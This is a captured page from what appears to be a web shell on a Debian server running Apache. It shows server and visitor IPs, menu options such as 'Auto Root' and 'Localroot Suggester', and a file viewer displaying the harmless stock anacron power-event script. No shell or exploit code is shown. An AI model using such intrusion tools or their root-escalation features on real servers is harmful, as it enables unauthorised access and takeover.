Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.173
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
apm /
event.d /
Delete
Unzip
Name
Size
Permission
Date
Action
anacron
753
B
-rwxr-xr-x
2017-05-29 18:36
Save
Rename
#! /bin/sh # This script makes anacron jobs start to run when the machine is # plugged into AC power, or woken up. For a laptop, these are the # closest parallels to turning on a desktop. # The /etc/init.d/anacron script now normally tries to avoid running # anacron unless on AC power, so as to avoid running down the battery. # (Things like the slocate updatedb cause a lot of IO.) Rather than # trying to second-guess which events reflect having or not having # power, we just try to run anacron every time and let it abort if # there's no AC. You'll see a message on the cron syslog facility # (typically /var/log/cron) if it does run. case "$1,$2" in change,power|resume,*) /usr/sbin/invoke-rc.d anacron start >/dev/null ;; esac